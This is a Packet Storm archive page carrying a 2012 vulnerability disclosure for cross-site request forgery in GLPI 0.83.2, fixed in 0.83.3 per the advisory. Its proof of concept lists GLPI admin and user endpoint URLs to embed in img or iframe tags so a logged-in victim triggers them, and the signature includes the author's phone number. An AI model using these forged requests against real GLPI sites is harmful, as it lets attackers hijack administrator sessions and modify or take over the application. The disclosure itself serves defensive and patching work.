exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

GLPI 0.83.2 Cross Site Request Forgery

GLPI 0.83.2 Cross Site Request Forgery
Posted Jul 12, 2012
Authored by Prajal Kulkarni

GLPI version 0.83.2 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 5f31bcd027e8a90e6ad43e5429e4745ad6726f0ca7d52f6197ace56e7370542d

GLPI 0.83.2 Cross Site Request Forgery

Change Mirror Download
Hi,



This is regarding multiple CSRF (Cross Site Request Forgery)

Vulnerabilities in [GLPI Version 0.83.2]. The following

is the disclosure document:



Title: Multiple CSRF Vulnerabilities in [GLPI Version 0.83.2]

------------------------------------------------------------------------

------------------------------------------------------------------------

Project: [GLPI Version 0.83.2]

Severity: High

Versions: 0.83.2 (other versions may be affected)

Exploit type: Multiple CSRF

Fixed: New release GLPI 0.83.3

------------------------------------------------------------------------

------------------------------------------------------------------------

Timeline:

27 June 2012: Vendor Contacted

27 June 2010: Vendor Response received

5 July 2012: Vendor releases new version

------------------------------------------------------------------------

------------------------------------------------------------------------

Product Description:

GLPI is the Information Resource-Manager with an additional
Administration- Interface. You can use

it to build up a database with an inventory for your company (computer,
software, printers...). It

has enhanced functions to make the daily life for the administrators
easier, like a

job-tracking-system with mail-notification and methods to build a
database with basic information

about your network-topology.

(Source: http://www.glpi-project.org/spip.php?article43)

------------------------------------------------------------------------

------------------------------------------------------------------------



Affected Files/Locations/Modules: /glpi/front



------------------------------------------------------------------------

------------------------------------------------------------------------





Vulnerability Details:

An attacker can execute functions as an authenticated user by tricking a

user into making requests to the Server. The attack works by including a

link or script in a page that accesses a site to which the user is known

(or is supposed) to have been authenticated. Successful exploitation of

these vulnerabilities could result in, but not limited to, compromise of

the application, theft of cookie-based authentication credentials,

arbitrary page redirection, disclosure or modification of sensitive data

and phishing attacks.



Since the vulnerabilities also exist in the administrative module, a

successful attack could cause a complete compromise of the entire

application. An attacker can send a link with the exploit to an

administrator whose access could compromise the application.

------------------------------------------------------------------------

------------------------------------------------------------------------



Proof of Concept:

Create a html content (img, iframes etc.) with the following PoC URLs as

src and host for the authenticated victim.





Eg URL:

http://localhost/glpi/front/preference.php?name=glpi&id=2&realname=Attac
ker&language=en_GB&use_mode=

0&update=Update



More Links:

http://localhost/glpi/front/user.form.php?id=3

http://localhost/glpi/front/user.form.php?id=2

http://localhost/glpi/front/user.form.php?id=5

http://localhost/glpi/front/user.form.php?id=4

http://localhost/glpi/front/user.form.php?new=1

http://localhost/glpi/front/profile.form.php?id=3

http://localhost/glpi/front/ruleimportcomputer.form.php

http://localhost/glpi/front/popup.php?popup=edit_bookmark

http://localhost/glpi/front/group.form.php

http://localhost/glpi/front/entity.form.php

http://localhost/glpi/front/popup.php

http://localhost/glpi/front/auth.settings.php

http://localhost/glpi/front/crontask.php?execute=*

http://localhost/glpi/front/fieldunicity.form.php

http://localhost/glpi/front/config.form.php

http://localhost/glpi/front/notificationmailsetting.form.php

http://localhost/glpi/front/*?reset=reset

http://localhost/glpi/front/backup.php?



------------------------------------------------------------------------

------------------------------------------------------------------------



Regards,



Prajal Kulkarni ||

Vulnerability Assessment & Penetration Testing

Mobile: 9738302731 ||

<http://www.microland.com/innovation.php>





The information transmitted is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material.
Any review, re-transmission, dissemination or other use of or taking of any action in reliance upon,this information by persons or entities other than the intended recipient is prohibited.
If you received this in error, please contact the sender and delete the material from your computer.
Microland takes all reasonable steps to ensure that its electronic communications are free from viruses.
However, given Internet accessibility, the Company cannot accept liability for any virus introduced by this e-mail or any attachment and you are advised to use up-to-date virus checking software.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close